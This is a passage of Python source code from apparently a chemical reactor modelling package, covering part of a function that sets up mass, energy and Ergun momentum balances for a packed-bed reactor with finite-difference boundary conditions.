_labelNameTime = []
for i in range(varNo):
# var list
_dataPacktime = dataPacktime[i]
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataXs, _dataPacktime)
# -> add label
# build label
for t in range(tNo):
_name = labelList[i] + " at t=" + str(opTSpan[t+1])
_labelNameTime.append(_name)
dataList = pltc.plots2DSetDataList(XYList, _labelNameTime)
# datalists
_dataListsLoop.append(dataList[0:tNo])
# reset
_labelNameTime = []
# select items
# indices = [0, 2, -1]
# selected_elements = [_dataListsLoop[index] for index in indices]
# select datalist
_dataListsSelected = selectFromListByIndex([1, -1], _dataListsLoop)
# subplot result
# pltc.plots2DSub(_dataListsSelected, "Reactor Length (m)",
# "Concentration (mol/m^3)", "Dynamic Modeling of 1D Plug-Flow Reactor")
# return
res = {
"XYList": XYList,
"dataList": dataList
}
return res
def modelEquationM7(t, y, paramsSet):
"""
M7 model [dynamic modeling]
mass, energy, and momentum balance equations
modelParameters:
reactionListSorted: reactant/product and coefficient lists
reactionStochCoeff: reaction stoichiometric coefficient
FunParam:
compList: component list
const
CrSeAr: reactor cross sectional area [m^2]
MoWei: component molecular weight [g/mol]
StHeRe25: standard heat of reaction at 25C [kJ/kmol] | [J/mol]
GaMiVi: gas mixture viscosity [Pa.s]
varNo: number of variables (Ci, CT, T)
varNoT: number of variables in the domain (zNo*varNoT)
reactionListNo: reaction list number
ReSpec: reactor spec
ExHe: exchange heat spec
OvHeTrCo: overall heat transfer coefficient [J/m^2.s.K]
EfHeTrAr: effective heat transfer area [m^2]
MeTe: medium temperature [K]
constBC1:
VoFlRa0: inlet volumetric flowrate [m^3/s],
SpCoi0: species concentration [kmol/m^3],
SpCo0: total concentration [kmol/m^3]
P0: inlet pressure [Pa]
T0: inlet temperature [K]
meshSetting:
solverMesh: mesh installment
solverMeshSet:
true: normal
false: mesh refinement
noLayer: number of layers
varNoLayer: var no in each layer
varNoLayerT: total number of vars (Ci,T,Cci,Tci)
varNoRows: number of var rows [j]
varNoColumns: number of var columns [i]
zNo: number of finite difference in z direction
rNo: number of orthogonal collocation points in r direction
dz: differential length [m]
dzs: differential length list [-]
zR: z ratio
zNoNo: number of nodes in the dense and normal sections
solverSetting:
reactionRateExpr: reaction rate expressions
DimensionlessAnalysisParams:
Cif: feed concentration [kmol/m^3]
Tf: feed temperature
vf: feed superficial velocity [m/s]
zf: domain length [m]
Dif: diffusivity coefficient of component [m^2/s]
Cpif: feed heat capacity at constant pressure [kJ/kmol.K] | [J/mol.K]
rf: particle radius [m]
GaMaCoTe0: feed mass convective term of gas phase [kmol/m^3.s]
GaMaDiTe0: feed mass diffusive term of gas phase [kmol/m^3.s]
GaHeCoTe0: feed heat convective term of gas phase [kJ/m^3.s]
GaHeDiTe0: feed heat diffusive term of gas phase [kJ/m^3.s]
SoMaDiTe0: feed mass diffusive term of solid phase [kmol/m^3.s]
SoHeDiTe0: feed heat diffusive term of solid phase [kJ/m^3.s]
ReNu0: Reynolds number
ScNu0: Schmidt number
ShNu0: Sherwood number
PrNu0: Prandtl number
PeNuMa0: mass Peclet number
PeNuHe0: heat Peclet number
MaTrCo: mass transfer coefficient - gas/solid [m/s]
HeTrCo: heat transfer coefficient - gas/solid [J/m^2.s.K]
"""
# params
reactionListSorted, reactionStochCoeff, FunParam, DimensionlessAnalysisParams = paramsSet
# fun params
# component symbol list
comList = FunParam['compList']
# const ->
const = FunParam['const']
# cross-sectional area [m^2]
CrSeAr = const['CrSeAr']
# component molecular weight [g/mol]
MoWei = const['MoWei']
# standard heat of reaction at 25C [kJ/kmol] | [J/mol]
StHeRe25 = const['StHeRe25']
# gas viscosity [Pa.s]
GaMiVi = const['GaMiVi']
# reaction no
reactionListNo = const['reactionListNo']
# reactor spec ->
ReSpec = FunParam['ReSpec']
# particle diameter [m]
PaDi = ReSpec['PaDi']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
# bulk density (catalyst bed density)
CaBeDe = ReSpec['CaBeDe']
# catalyst density [kgcat/m^3 of particle]
CaDe = ReSpec['CaDe']
# catalyst heat capacity at constant pressure [kJ/kg.K]
CaSpHeCa = ReSpec['CaSpHeCa']
# catalyst porosity
CaPo = ReSpec['CaPo']
# catalyst tortuosity
CaTo = ReSpec['CaTo']
# catalyst thermal conductivity [J/K.m.s]
CaThCo = ReSpec['CaThCo']
# exchange heat spec ->
ExHe = FunParam['ExHe']
# var no. (concentration, temperature)
varNo = const['varNo']
# var no. in the domain
varNoT = const['varNoT']
# boundary conditions constants
constBC1 = FunParam['constBC1']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = constBC1['VoFlRa0']
# inlet species concentration [kmol/m^3]
SpCoi0 = constBC1['SpCoi0']
# inlet total concentration [kmol/m^3]
SpCo0 = constBC1['SpCo0']
# inlet pressure [Pa]
P0 = constBC1['P0']
# inlet temperature [K]
T0 = constBC1['T0']
# inlet superficial velocity [m/s]
# SuGaVe0 = constBC1['SuGaVe0']
# inlet diffusivity coefficient [m^2/s]
GaDii0 = constBC1['GaDii0']
# inlet gas thermal conductivity [J/s.m.K]
GaThCoi0 = constBC1['GaThCoi0']
# gas viscosity
GaVii0 = constBC1['GaVii0']
# gas density [kg/m^3]
GaDe0 = constBC1['GaDe0']
# heat capacity at constant pressure [kJ/kmol.K] | [J/mol.K]
GaCpMeanMix0 = constBC1['GaCpMeanMix0']
# gas thermal conductivity [J/s.m.K]
GaThCoMix0 = constBC1['GaThCoMix0']
# mesh setting
meshSetting = FunParam['meshSetting']
# mesh installment
solverMesh = meshSetting['solverMesh']
# mesh refinement
solverMeshSet = meshSetting['solverMeshSet']
# number of layers
noLayer = meshSetting['noLayer']
# var no in each layer
varNoLayer = meshSetting['varNoLayer']
# total number of vars (Ci,T,Cci,Tci)
varNoLayerT = meshSetting['varNoLayerT']
# number of var rows [j]
varNoRows = meshSetting['varNoRows']
# number of var columns [i]
varNoColumns = meshSetting['varNoColumns']
# rNo
rNo = meshSetting['rNo']
# zNo
zNo = meshSetting['zNo']
# dz [m]
dz = meshSetting['dz']
# dzs [m]/[-]
dzs = meshSetting['dzs']
# z ratio
zR = meshSetting['zR']
# number of nodes in the dense and normal sections
zNoNo = meshSetting['zNoNo']
# dense
zNoNoDense = zNoNo[0]
# normal
zNoNoNormal = zNoNo[1]
# solver setting
solverSetting = FunParam['solverSetting']
# mass balance equation
DIFF1_C_SET = solverSetting['dFdz']
DIFF2_C_SET_BC1 = solverSetting['d2Fdz2']['BC1']
DIFF2_C_SET_BC2 = solverSetting['d2Fdz2']['BC2']
DIFF2_C_SET_G = solverSetting['d2Fdz2']['G']
# energy balance equation
DIFF1_T_SET = solverSetting['dTdz']
DIFF2_T_SET_BC1 = solverSetting['d2Tdz2']['BC1']
DIFF2_T_SET_BC2 = solverSetting['d2Tdz2']['BC2']
DIFF2_T_SET_G = solverSetting['d2Tdz2']['G']
# reaction rate expressions
reactionRateExpr = FunParam['reactionRateExpr']
# using equation
varisSet = reactionRateExpr['VARS']
ratesSet = reactionRateExpr['RATES']
# dimensionless analysis params
# feed concentration [kmol/m^3]
Cif = DimensionlessAnalysisParams['Cif']
# feed temperature
Tf = DimensionlessAnalysisParams['Tf']
# feed superficial velocity [m/s]
vf = DimensionlessAnalysisParams['vf']
# domain length [m]
zf = DimensionlessAnalysisParams['zf']
# particle radius [m]
rf = DimensionlessAnalysisParams['rf']
# diffusivity coefficient of component [m^2/s]
Dif = DimensionlessAnalysisParams['Dif']
# feed heat capacity at constant pressure
Cpif = DimensionlessAnalysisParams['Cpif']
# feed mass convective term of gas phase [kmol/m^3.s]
GaMaCoTe0 = DimensionlessAnalysisParams['GaMaCoTe0']
# feed mass diffusive term of gas phase [kmol/m^3.s]
GaMaDiTe0 = DimensionlessAnalysisParams['GaMaDiTe0']
# feed heat convective term of gas phase [kJ/m^3.s]
GaHeCoTe0 = DimensionlessAnalysisParams['GaHeCoTe0']
# feed heat diffusive term of gas phase [kJ/m^3.s]
GaHeDiTe0 = DimensionlessAnalysisParams['GaHeDiTe0']
# feed mass diffusive term of solid phase [kmol/m^3.s]
SoMaDiTe0 = DimensionlessAnalysisParams['SoMaDiTe0']
# feed heat diffusive term of solid phase [kJ/m^3.s]
SoHeDiTe0 = DimensionlessAnalysisParams['SoHeDiTe0']
# Reynolds number
ReNu = DimensionlessAnalysisParams['ReNu0']
# Schmidt number
ScNu = DimensionlessAnalysisParams['ScNu0']
# Sherwood number
ShNu = DimensionlessAnalysisParams['ShNu0']
# Prandtl number
PrNu = DimensionlessAnalysisParams['PrNu0']
# mass Peclet number
PeNuMa0 = DimensionlessAnalysisParams['PeNuMa0']
# heat Peclet number
PeNuHe0 = DimensionlessAnalysisParams['PeNuHe0']
# mass transfer coefficient - gas/solid [m/s]
MaTrCo = DimensionlessAnalysisParams['MaTrCo']
# heat transfer coefficient - gas/solid [J/m^2.s.K]
HeTrCo = DimensionlessAnalysisParams['HeTrCo']
# components no
# y: component molar flowrate, total molar flux, temperature, pressure
compNo = len(comList)
indexT = compNo
indexP = indexT + 1
indexV = indexP + 1
# calculate
# particle radius
PaRa = PaDi/2
# specific surface area exposed to the free fluid [m^2/m^3]
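# for spherical particles: SpSuAr = 3*(1 - BeVoFr)/PaRa = 6*(1 - BeVoFr)/PaDi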
SpSuAr = (3/PaRa)*(1 - BeVoFr)
# molar flowrate [kmol/s]
MoFlRa0 = SpCo0*VoFlRa0
# interstitial gas velocity [m/s]
InGaVe0 = VoFlRa0/(CrSeAr*BeVoFr)
# superficial gas velocity [m/s]
SuGaVe0 = InGaVe0*BeVoFr
# interstitial gas velocity [m/s]
InGaVeList_z = np.zeros(zNo)
InGaVeList_z[0] = InGaVe0
# total molar flux [kmol/m^2.s]
MoFl_z = np.zeros(zNo)
MoFl_z[0] = MoFlRa0
# reaction rate in the solid phase
Ri_z = np.zeros((zNo, reactionListNo))
Ri_zr = np.zeros((zNo, rNo, reactionListNo))
Ri_r = np.zeros((rNo, reactionListNo))
# reaction rate
# ri = np.zeros(compNo) # deprecate
# ri0 = np.zeros(compNo) # deprecate
# solid phase
ri_r = np.zeros((rNo, compNo))
# overall reaction
OvR = np.zeros(rNo)
# overall enthalpy
OvHeReT = np.zeros(rNo)
# heat capacity at constant pressure
SoCpMeanMix = np.zeros(rNo)
# effective heat capacity at constant pressure
SoCpMeanMixEff = np.zeros(rNo)
# dimensionless analysis
SoCpMeanMixEff_ReVa = np.zeros(rNo)
# pressure [Pa]
P_z = np.zeros(zNo + 1)
P_z[0] = P0
# superficial gas velocity [m/s]
v_z = np.zeros(zNo + 1)
v_z[0] = SuGaVe0
# NOTE
# distribute y[i] value through the reactor length
# reshape
yLoop = np.reshape(y, (noLayer, varNoRows, varNoColumns))
# all species concentration in gas & solid phase
SpCo_mz = np.zeros((noLayer - 1, varNoRows, varNoColumns))
# all species concentration in gas phase [kmol/m^3]
SpCoi_z = np.zeros((compNo, zNo))
# all species concentration in solid phase (catalyst) [kmol/m^3]
SpCosi_mzr = np.zeros((compNo, rNo, zNo))
# layer
for m in range(compNo):
# -> concentration [kmol/m^3]
_SpCoi = yLoop[m]
SpCo_mz[m] = _SpCoi
# concentration in the gas phase [kmol/m^3]
for m in range(compNo):
for j in range(varNoRows):
if j == 0:
# gas phase
SpCoi_z[m, :] = SpCo_mz[m, j, :]
else:
# solid phase
SpCosi_mzr[m, j-1, :] = SpCo_mz[m, j, :]
# species concentration in gas phase [kmol/m^3]
CoSpi = np.zeros(compNo)
# dimensionless analysis
CoSpi_ReVa = np.zeros(compNo)
# total concentration [kmol/m^3]
CoSp = 0
# species concentration in solid phase (catalyst) [kmol/m^3]
# shape
CosSpiMatShape = (rNo, compNo)
CosSpi_r = np.zeros(CosSpiMatShape)
# dimensionless analysis
CosSpi_r_ReVa = np.zeros(CosSpiMatShape)
# total concentration in the solid phase [kmol/m^3]
CosSp_r = np.zeros(rNo)
# flux
MoFli_z = np.zeros(compNo)
# NOTE
# temperature [K]
T_mz = np.zeros((varNoRows, varNoColumns))
T_mz = yLoop[noLayer - 1]
# temperature in the gas phase
T_z = np.zeros(zNo)
T_z = T_mz[0, :]
# temperature in solid phase
Ts_z = np.zeros((rNo, zNo))
Ts_z = T_mz[1:]
# temperature in the solid phase
Ts_r = np.zeros(rNo)
# diff/dt
# dxdt = []
# matrix
# dxdtMat = np.zeros((varNo, zNo))
dxdtMat = np.zeros((noLayer, varNoRows, varNoColumns))
# NOTE
# FIXME
# define ode equations for each finite difference [zNo]
for z in range(varNoColumns):
## block ##
# concentration species in the gas phase [kmol/m^3]
for i in range(compNo):
_SpCoi_z = SpCoi_z[i][z]
CoSpi[i] = max(_SpCoi_z, CONST.EPS_CONST)
# REVIEW
# dimensionless analysis: real value
SpCoi0_Set = SpCoi0[i] if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.max(
SpCoi0)
CoSpi_ReVa[i] = rmtUtil.calRealDiLessValue(
CoSpi[i], SpCoi0_Set)
# total concentration [kmol/m^3]
CoSp = np.sum(CoSpi)
# dimensionless analysis: real value
CoSp_ReVa = np.sum(CoSpi_ReVa)
# FIXME
# concentration species in the solid phase [kmol/m^3]
# display concentration list in each oc point (rNo)
for i in range(compNo):
for r in range(rNo):
_CosSpi_z = SpCosi_mzr[i][r][z]
CosSpi_r[r][i] = max(_CosSpi_z, CONST.EPS_CONST)
# REVIEW
# dimensionless analysis: real value
SpCoi0_r_Set = SpCoi0[i] if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.max(
SpCoi0)
CosSpi_r_ReVa[r][i] = rmtUtil.calRealDiLessValue(
CosSpi_r[r][i], SpCoi0_r_Set)
# total concentration in the solid phase [kmol/m^3]
CosSp_r = np.sum(CosSpi_r, axis=1).reshape((rNo, 1))
# dimensionless analysis: real value
CosSp_r_ReVa = np.sum(CosSpi_r_ReVa, axis=1).reshape((rNo, 1))
# concentration in the outer surface of the catalyst [kmol/m^3]
CosSpi_cat = CosSpi_r[0]
# dimensionless analysis
CosSpi_cat_DiLeVa = CosSpi_r[0, :]
# temperature [K]
T = T_z[z]
T_ReVa = rmtUtil.calRealDiLessValue(T, T0, "TEMP")
# temperature in the solid phase (for each point)
# Ts[3], Ts[2], Ts[1], Ts[0]
Ts_r = Ts_z[:, z]
Ts_r_ReVa0 = rmtUtil.calRealDiLessValue(Ts_r, Tf, "TEMP")
Ts_r_ReVa = np.reshape(Ts_r_ReVa0, -1)
# pressure [Pa]
P = P_z[z]
# FIXME
# velocity
# dimensionless value
# v = v_z[z]
v = 1
## calculate ##
# mole fraction in the gas phase
MoFri = np.array(
rmtUtil.moleFractionFromConcentrationSpecies(CoSpi_ReVa))
# mole fraction in the solid phase
# MoFrsi_r0 = CosSpi_r/CosSp_r
MoFrsi_r = rmtUtil.moleFractionFromConcentrationSpeciesMat(
CosSpi_r_ReVa)
# TODO
# dv/dz
# gas velocity based on interstitial velocity [m/s]
# InGaVe = rmtUtil.calGaVeFromEOS(InGaVe0, SpCo0, CoSp, P0, P)
# superficial gas velocity [m/s]
# SuGaVe = InGaVe*BeVoFr
# from ode eq. dv/dz
SuGaVe = v
# dimensionless analysis
SuGaVe_ReVa = rmtUtil.calRealDiLessValue(SuGaVe, SuGaVe0)
# total flowrate [kmol/s]
# [kmol/m^3]*[m/s]*[m^2]
MoFlRa = calMolarFlowRate(CoSp_ReVa, SuGaVe_ReVa, CrSeAr)
# molar flowrate list [kmol/s]
MoFlRai = MoFlRa*MoFri
# convert to [mol/s]
MoFlRai_Con1 = 1000*MoFlRai
# molar flux [kmol/m^2.s]
MoFl = MoFlRa/CrSeAr
# volumetric flowrate [m^3/s]
VoFlRai = calVolumetricFlowrateIG(P, T, MoFlRai_Con1)
# mixture molecular weight [kg/mol]
MiMoWe = rmtUtil.mixtureMolecularWeight(MoFri, MoWei, "kg/mol")
# gas density [kg/m^3]
GaDe = calDensityIG(MiMoWe, CoSp_ReVa*1000)
# GaDeEOS = calDensityIGFromEOS(P, T, MiMoWe)
# dimensionless value
GaDe_DiLeVa = rmtUtil.calDiLessValue(GaDe, GaDe0)
# NOTE
# ergun equation
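# Ergun pressure drop along the packed bed:
# -dP/dz = 150*mu*(1-e)^2*v/(e^3*dp^2) + 1.75*rho*(1-e)*v^2/(e^3*dp)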
ergA = 150*GaMiVi*SuGaVe_ReVa/(PaDi**2)
ergB = ((1-BeVoFr)**2)/(BeVoFr**3)
ergC = 1.75*GaDe*(SuGaVe_ReVa**2)/PaDi
ergD = (1-BeVoFr)/(BeVoFr**3)
RHS_ergun = -1*(ergA*ergB + ergC*ergD)
# momentum balance (ergun equation)
dxdt_P = RHS_ergun
# dxdt.append(dxdt_P)
P_z[z+1] = dxdt_P*dz + P_z[z]
# REVIEW
# FIXME
# viscosity in the gas phase [Pa.s] | [kg/m.s]
GaVii = GaVii0 if MODEL_SETTING['GaVii'] == "FIX" else calTest()
# mixture viscosity in the gas phase [Pa.s] | [kg/m.s]
# FIXME
GaViMix = 2.5e-5 # f(yi,GaVi,MWs);
# kinematic viscosity in the gas phase [m^2/s]
GaKiViMix = GaViMix/GaDe
# REVIEW
# FIXME
# solid gas thermal conductivity
SoThCoMix0 = GaThCoMix0
# add loop for each r point/constant
# catalyst thermal conductivity [J/s.m.K]
# CaThCo
# membrane wall thermal conductivity [J/s.m.K]
MeThCo = 1
# thermal conductivity - gas phase [J/s.m.K]
# GaThCoi = np.zeros(compNo) # f(T);
GaThCoi = GaThCoi0 if MODEL_SETTING['GaThCoi'] == "FIX" else calTest(
)
# dimensionless
GaThCoi_DiLe = GaThCoi/GaThCoi0
# FIXME
# mixture thermal conductivity - gas phase [J/s.m.K]
GaThCoMix = GaThCoMix0
# dimensionless analysis
GaThCoMix_DiLeVa = GaThCoMix/GaThCoMix0
# thermal conductivity - solid phase [J/s.m.K]
# assume the same as gas phase
# SoThCoi = np.zeros(compNo) # f(T);
SoThCoi = GaThCoi
# mixture thermal conductivity - solid phase [J/s.m.K]
SoThCoMix = GaThCoMix0
# dimensionless analysis
SoThCoMix_DiLeVa = SoThCoMix/SoThCoMix0
# effective thermal conductivity - gas phase [J/s.m.K]
# GaThCoEff = BeVoFr*GaThCoMix + (1 - BeVoFr)*CaThCo
GaThCoEff = BeVoFr*GaThCoMix
# dimensionless analysis
GaThCoEff_DiLeVa = BeVoFr*GaThCoMix_DiLeVa
# FIXME
# effective thermal conductivity - solid phase [J/s.m.K]
# assume identical to gas phase
# SoThCoEff0 = CaPo*SoThCoMix + (1 - CaPo)*CaThCo
# SoThCoEff = CaThCo*((1 - CaPo)/CaTo)
SoThCoEff = CaPo*SoThCoMix
# dimensionless analysis
# SoThCoEff_DiLeVa = GaThCoMix_DiLeVa*((1 - CaPo)/CaTo)
SoThCoEff_DiLeVa = CaPo*SoThCoMix_DiLeVa
# REVIEW
# diffusivity coefficient - gas phase [m^2/s]
GaDii = GaDii0 if MODEL_SETTING['GaDii'] == "FIX" else calTest()
# dimensionless analysis
GaDii_DiLeVa = GaDii/GaDii0
# effective diffusivity coefficient - gas phase
GaDiiEff = GaDii*BeVoFr
# dimensionless analysis
GaDiiEff_DiLeVa = GaDiiEff/GaDii0
# effective diffusivity - solid phase [m^2/s]
SoDiiEff = (CaPo/CaTo)*GaDii
# dimensionless analysis
SoDiiEff_DiLe = (CaPo/CaTo)*GaDii_DiLeVa
# REVIEW
if MODEL_SETTING['MaTrCo'] != "FIX":
### dimensionless numbers ###
# Re Number
ReNu = calReNoEq1(GaDe, SuGaVe, PaDi, GaViMix)
# Sc Number
ScNu = calScNoEq1(GaDe, GaViMix, GaDii)
# Sh Number (choose method)
ShNu = calShNoEq1(ScNu, ReNu, CONST_EQ_Sh['Frossling'])
# mass transfer coefficient - gas/solid [m/s]
MaTrCo = calMassTransferCoefficientEq1(ShNu, GaDii, PaDi)
# NOTE
## kinetics ##
# net reaction rate expression [kmol/m^3.s]
# rf[kmol/kgcat.s]*CaDe[kgcat/m^3]
for r in range(rNo):
# loop
loopVars0 = (Ts_r_ReVa[r], P_z[z],
MoFrsi_r[r], CosSpi_r_ReVa[r])
# component formation rate [mol/m^3.s]
# check unit
r0 = np.array(reactionRateExe(
loopVars0, varisSet, ratesSet))
# loop
Ri_zr[z, r, :] = r0
Ri_r[r, :] = r0
# component formation rate [kmol/m^3.s]
ri_r[r] = componentFormationRate(
compNo, comList, reactionStochCoeff, Ri_r[r])
# overall formation rate [kmol/m^3.s]
OvR[r] = np.sum(ri_r[r])
# NOTE
### enthalpy calculation ###
# gas phase
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
GaCpMeanList = calMeanHeatCapacityAtConstantPressure(
comList, T_ReVa)
# Cp mixture
GaCpMeanMix = calMixtureHeatCapacityAtConstantPressure(
MoFri, GaCpMeanList)
# dimensionless analysis
GaCpMeanMix_DiLeVa = rmtUtil.calDiLessValue(
GaCpMeanMix, GaCpMeanMix0)
# effective heat capacity - gas phase [kJ/kmol.K] | [J/mol.K]
GaCpMeanMixEff = GaCpMeanMix*BeVoFr
# dimensionless analysis
GaCpMeanMixEff_DiLeVa = GaCpMeanMix_DiLeVa*BeVoFr
# solid phase
for r in range(rNo):
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
SoCpMeanList = calMeanHeatCapacityAtConstantPressure(
comList, Ts_r_ReVa[r])
# Cp mixture
SoCpMeanMix[r] = calMixtureHeatCapacityAtConstantPressure(
MoFrsi_r[r], SoCpMeanList)
# effective heat capacity - solid phase [kJ/m^3.K]
SoCpMeanMixEff_ReVa[r] = CosSp_r_ReVa[r] * \
SoCpMeanMix[r]*CaPo + (1-CaPo)*CaDe*CaSpHeCa
# enthalpy change from Tref to T [kJ/kmol] | [J/mol]
# enthalpy change
EnChList = np.array(
calEnthalpyChangeOfReaction(reactionListSorted, Ts_r_ReVa[r]))
# heat of reaction at T [kJ/kmol] | [J/mol]
HeReT = np.array(EnChList + StHeRe25)
# overall heat of reaction [kJ/m^3.s]
# exothermic reaction (negative sign)
# endothermic sign (positive sign)
OvHeReT[r] = np.dot(Ri_r[r, :], HeReT)
# REVIEW
if MODEL_SETTING['HeTrCo'] != "FIX":
### dimensionless numbers ###
# Prandtl Number
# MW kg/mol -> g/mol
# MiMoWe_Conv = 1000*MiMoWe
PrNu = calPrNoEq1(
GaCpMeanMix, GaViMix, GaThCoMix, MiMoWe)
# Nu number
NuNu = calNuNoEq1(PrNu, ReNu)
# heat transfer coefficient - gas/solid [J/m^2.s.K]
HeTrCo = calHeatTransferCoefficientEq1(NuNu, GaThCoMix, PaDi)
# REVIEW
# heat transfer coefficient - medium side [J/m2.s.K]
# hs = heat_transfer_coefficient_shell(T,Tv,Pv,Pa);
# overall heat transfer coefficient [J/m2.s.K]
# U = overall_heat_transfer_coefficient(hfs,kwall,do,di,L);
# heat transfer coefficient - permeate side [J/m2.s.K]
# NOTE
# cooling temperature [K]
Tm = ExHe['MeTe']
# overall heat transfer coefficient [J/s.m2.K]
U = ExHe['OvHeTrCo']
# heat transfer area over volume [m^2/m^3]
a = ExHe['EfHeTrAr']
# heat transfer parameter [W/m^3.K] | [J/s.m^3.K]
# Ua = U*a
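# Qm below is the heat exchanged with the surrounding medium per unit
# reactor volume, i.e. U*a*(Tm - T), returned in [kJ/m^3.s]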
# external heat [kJ/m^3.s]
Qm = rmtUtil.calHeatExchangeBetweenReactorMedium(
Tm, T_ReVa, U, a, 'kJ/m^3.s')
# NOTE
# mass transfer between
for i in range(compNo):
### gas phase ###
# mass balance (forward difference)
# concentration [kmol/m^3]
# central
Ci_c = SpCoi_z[i][z]
# concentration in the catalyst surface [kmol/m^3]
# CosSpi_cat
# dimensionless analysis: reference (feed) concentration used to re-dimensionalize the driving force
Ci_f = SpCoi0[i] if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.max(
SpCoi0)
# inward flux [kmol/m^2.s]
MoFli_z[i] = MaTrCo[i]*Ci_f*(Ci_c - CosSpi_cat_DiLeVa[i])
# total mass transfer between gas and solid phases [kmol/m^3]
ToMaTrBeGaSo_z = np.sum(MoFli_z)*SpSuAr
# NOTE
# velocity from global concentration
# check BC
# if z == 0:
# # BC1
# constT_BC1 = (GaThCoEff)/(MoFl*GaCpMeanMix/1000)
# # next node
# T_f = T_z[z+1]
# # previous node
# T_b = (T0*dz + constT_BC1*T_f)/(dz + constT_BC1)
# elif z == zNo - 1:
# # BC2
# # previous node
# T_b = T_z[z - 1]
# # next node
# T_f = 0
# else:
# # interior nodes
# T_b = T_z[z-1]
# # next node
# T_f = T_z[z+1]
# dxdt_v_T = (T_z[z] - T_b)/dz
# # CoSp x 1000
# # OvR x 1000
# dxdt_v = (1/(CoSp*1000))*((-SuGaVe/CONST.R_CONST) *
# ((1/T_z[z])*dxdt_P - (P_z[z]/T_z[z]**2)*dxdt_v_T) - ToMaTrBeGaSo_z*1000)
# velocity [forward value] is updated
# backward value of temp is taken
# dT/dt will update the old value
# FIXME
# v_z[z+1] = dxdt_v*dz + v_z[z]
# v_z[z+1] = v
# FIXME
v_z[z+1] = v_z[z]
# dimensionless analysis
v_z_DiLeVa = rmtUtil.calDiLessValue(v_z[z+1], vf)
# NOTE
# diff/dt
# dxdt = []
# matrix
# dxdtMat = np.zeros((varNo, zNo))
# bulk temperature [K]
T_c = T_z[z]
# universal index [j,i]
# UISet = z*(rNo + 1)
# NOTE
# concentration [kmol/m^3]
for i in range(compNo):
### gas phase ###
# mass balance (forward difference)
# concentration [kmol/m^3]
# central
Ci_c = SpCoi_z[i][z]
# check BC
if z == 0 and solverMeshSet is True:
# NOTE
# BC1 (normal)
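# a Danckwerts-type inlet condition, C* - (1/PeNuMa0)*dC*/dz* = C*_in at z* = 0,
# is discretized here; the backward (ghost) node Ci_b is back-calculated from it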
BC1_C_1 = PeNuMa0[i]*dz
BC1_C_2 = 1/BC1_C_1
# forward
Ci_f = SpCoi_z[i][z+1]
Ci_ff = SpCoi_z[i][z+2]
# backward
# GaDii_DiLeVa = 1
Ci_0 = 1 if MODEL_SETTING['GaMaCoTe0'] != "MAX" else SpCoi0[i]/np.max(
SpCoi0)
Ci_b = (Ci_0 + BC1_C_2*Ci_f)/(BC1_C_2 + 1)
Ci_bb = 0
# function value
dFdz_C = [Ci_b, Ci_c, Ci_f]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# dFdz
dCdz = FiDiDerivative1(dFdz_C, dz, DIFF1_C_SET)
# d2Fdz2
d2Cdz2 = FiDiDerivative2(d2Fdz2_C, dz, DIFF2_C_SET_BC1)
elif z == 0 and solverMeshSet is False:
# NOTE
# BC1 (dense)
# i=0 is discretized based on inlet
# i=1
BC1_C_1 = PeNuMa0[i]*dzs[z]
BC1_C_2 = 1/BC1_C_1
# forward
Ci_f = SpCoi_z[i][z+1]
Ci_ff = SpCoi_z[i][z+2]
# backward
# GaDii_DiLeVa = 1
Ci_0 = 1 if MODEL_SETTING['GaMaCoTe0'] != "MAX" else SpCoi0[i]/np.max(
SpCoi0)
Ci_b = (Ci_0 + BC1_C_2*Ci_f)/(BC1_C_2 + 1)
Ci_bb = 0
# function value
dFdz_C = [Ci_b, Ci_c, Ci_f]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# REVIEW
### uniform nodes ###
# dFdz
dCdz = FiDiDerivative1(dFdz_C, dzs[z], DIFF1_C_SET)
# d2Fdz2
# d2Cdz2 = FiDiDerivative2(d2Fdz2_C, dzs[z], DIFF2_C_SET_BC1)
### non-uniform nodes ###
# R value
_zR_b = 0
_zR_c = dzs[z]/dzs[z-1]
# dCdz = FiDiNonUniformDerivative1(
# dFdz_C, dzs[z], DIFF1_C_SET, zR[z])
# d2Fdz2
d2Cdz2 = FiDiNonUniformDerivative2(
d2Fdz2_C, dzs[z], DIFF2_C_SET_BC1, _zR_c)
# FIXME
checkME = 0
elif (z > 0 and z < zNoNoDense) and solverMeshSet is False:
# NOTE
# dense section
# i=2,...,zNoNoDense-1
# forward
Ci_f = SpCoi_z[i][z+1]
Ci_ff = SpCoi_z[i][z+2]
# backward
Ci_b = SpCoi_z[i][z-1]
Ci_bb = SpCoi_z[i][z-2]
# function value
dFdz_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# REVIEW
### non-uniform nodes ###
# R value
_zR_b = dzs[z-2]/dzs[z-1]
_zR_c = dzs[z]/dzs[z-1]
#
dCdz = FiDiNonUniformDerivative1(
dFdz_C, dzs[z], DIFF1_C_SET, _zR_b)
# d2Fdz2
d2Cdz2 = FiDiNonUniformDerivative2(
d2Fdz2_C, dzs[z], DIFF2_C_SET_G, _zR_c)
# FIXME
checkME = 0
elif z == zNo - 1:
# NOTE
# BC2
# backward
Ci_b = SpCoi_z[i][z-1]
Ci_bb = SpCoi_z[i][z-2]
# forward difference
Ci_f = Ci_b
Ci_ff = 0
# function value
dFdz_C = [Ci_b, Ci_c, Ci_f]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# dFdz
dCdz = FiDiDerivative1(dFdz_C, dz, DIFF1_C_SET)
# d2Fdz2
d2Cdz2 = FiDiDerivative2(d2Fdz2_C, dz, DIFF2_C_SET_BC2)
else:
# NOTE
# normal sections
# interior nodes
# forward
Ci_f = SpCoi_z[i][z+1]
Ci_ff = SpCoi_z[i][z+2] if z < zNo-2 else 0
# backward
Ci_b = SpCoi_z[i][z-1]
Ci_bb = SpCoi_z[i][z-2]
# function value
dFdz_C = [Ci_b, Ci_c, Ci_f]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
